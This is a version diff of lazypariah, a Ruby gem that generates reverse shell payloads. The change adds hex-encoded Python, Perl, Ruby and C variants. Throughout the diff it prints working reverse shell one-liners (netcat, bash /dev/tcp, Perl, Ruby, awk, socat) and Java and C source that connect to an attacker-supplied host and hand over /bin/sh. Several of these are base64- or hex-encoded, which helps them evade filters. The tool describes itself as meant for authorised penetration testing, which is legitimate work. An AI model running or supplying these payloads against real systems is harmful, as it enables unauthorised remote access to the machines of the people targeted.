lazypariah 0.3.0 → 0.4.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/bin/lazypariah +45 -7
  3. metadata +2 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
4
- data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
3
+ metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
4
+ data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
5
5
  SHA512:
6
- metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
7
- data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532
6
+ metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
7
+ data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93
data/bin/lazypariah CHANGED
@@ -1,7 +1,7 @@
1
1
  #!/usr/bin/env ruby
2
2
  #
3
3
  # Title: LAZYPARIAH
4
- # Version: 0.3.0
4
+ # Version: 0.4.0
5
5
  # Description:
6
6
  # LAZYPARIAH is a simple tool for generating various reverse shell payloads
7
7
  # on the fly. It is intended to be used only in authorised circumstances by
@@ -29,7 +29,7 @@ require "stringio"
29
29
 
30
30
  # Define constants.
31
31
  PROGRAM_NAME = "LAZYPARIAH".freeze()
32
- PROGRAM_VERSION = "0.3.0".freeze()
32
+ PROGRAM_VERSION = "0.4.0".freeze()
33
33
  EXECUTABLE_NAME = "lazypariah".freeze()
34
34
 
35
35
  # Define payload list.
@@ -41,6 +41,9 @@ PAYLOAD_LIST = [
41
41
  "python3_b64",
42
42
  "python2_b64",
43
43
  "python_b64",
44
+ "python3_hex",
45
+ "python2_hex",
46
+ "python_hex",
44
47
  "nc",
45
48
  "nc_pipe",
46
49
  "php_fd_3",
@@ -57,9 +60,12 @@ PAYLOAD_LIST = [
57
60
  "php_fd_6_tags",
58
61
  "perl",
59
62
  "perl_c",
63
+ "perl_b64",
64
+ "perl_hex",
60
65
  "ruby",
61
66
  "ruby_c",
62
67
  "ruby_b64",
68
+ "ruby_hex",
63
69
  "bash_tcp",
64
70
  "awk",
65
71
  "socat",
@@ -68,8 +74,10 @@ PAYLOAD_LIST = [
68
74
  "java_class_gzip_b64",
69
75
  "c_binary",
70
76
  "c_binary_b64",
77
+ "c_binary_hex",
71
78
  "c_binary_gzip",
72
- "c_binary_gzip_b64"
79
+ "c_binary_gzip_b64",
80
+ "c_binary_gzip_hex"
73
81
  ].sort()
74
82
 
75
83
  # Define function for displaying program information.
@@ -166,12 +174,21 @@ begin
166
174
  when "python3_b64"
167
175
  code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
168
176
  print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
177
+ when "python3_hex"
178
+ code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
179
+ print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
169
180
  when "python2_b64"
170
181
  code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
171
182
  print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
183
+ when "python2_hex"
184
+ code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
185
+ print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
172
186
  when "python_b64"
173
187
  code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
174
188
  print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
189
+ when "python_hex"
190
+ code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
191
+ print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
175
192
  when "nc"
176
193
  print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
177
194
  when "nc_pipe"
@@ -204,6 +221,12 @@ begin
204
221
  print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
205
222
  when "perl_c"
206
223
  print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
224
+ when "perl_b64"
225
+ code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
226
+ print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
227
+ when "perl_hex"
228
+ code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
229
+ print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
207
230
  when "ruby"
208
231
  print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
209
232
  when "ruby_c"
@@ -211,12 +234,15 @@ begin
211
234
  when "ruby_b64"
212
235
  code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
213
236
  print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
237
+ when "ruby_hex"
238
+ code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
239
+ print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
214
240
  when "bash_tcp"
215
241
  print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
216
242
  when "awk"
217
243
  print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
218
244
  when "socat"
219
- print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
245
+ print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
220
246
  when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
221
247
  code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
222
248
 
@@ -246,7 +272,7 @@ begin
246
272
  end
247
273
 
248
274
  system("rm -r #{temp_dir}")
249
- when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
275
+ when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
250
276
  code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
251
277
 
252
278
  temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
@@ -261,7 +287,10 @@ begin
261
287
  print_output(binary_payload)
262
288
  when "c_binary_b64"
263
289
  binary_payload_b64 = Base64.strict_encode64(binary_payload)
264
- print_output(binary_payload_b64)
290
+ print_output(binary_payload_b64, url_encode=url_encode)
291
+ when "c_binary_hex"
292
+ binary_payload_hex = binary_payload.unpack("H*")[0]
293
+ print_output(binary_payload_hex)
265
294
  when "c_binary_gzip"
266
295
  sio = StringIO.new()
267
296
  sio.binmode()
@@ -269,7 +298,7 @@ begin
269
298
  gz.write(binary_payload)
270
299
  gz.close()
271
300
  binary_payload_gzip = sio.string
272
- print_output(binary_payload_gzip, url_encode)
301
+ print_output(binary_payload_gzip)
273
302
  when "c_binary_gzip_b64"
274
303
  sio = StringIO.new()
275
304
  sio.binmode()
@@ -279,6 +308,15 @@ begin
279
308
  binary_payload_gzip = sio.string
280
309
  binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
281
310
  print_output(binary_payload_gzip_b64, url_encode=url_encode)
311
+ when "c_binary_gzip_hex"
312
+ sio = StringIO.new()
313
+ sio.binmode()
314
+ gz = Zlib::GzipWriter.new(sio)
315
+ gz.write(binary_payload)
316
+ gz.close()
317
+ binary_payload_gzip = sio.string
318
+ binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
319
+ print_output(binary_payload_gzip_hex)
282
320
  end
283
321
  end
284
322
 
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: lazypariah
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.3.0
4
+ version: 0.4.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Peter Funnell
8
8
  autorequire:
9
9
  bindir: bin
10
10
  cert_chain: []
11
- date: 2020-11-23 00:00:00.000000000 Z
11
+ date: 2020-11-24 00:00:00.000000000 Z
12
12
  dependencies: []
13
13
  description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
14
14
  on the fly. It is intended to be used only in authorised circumstances by qualified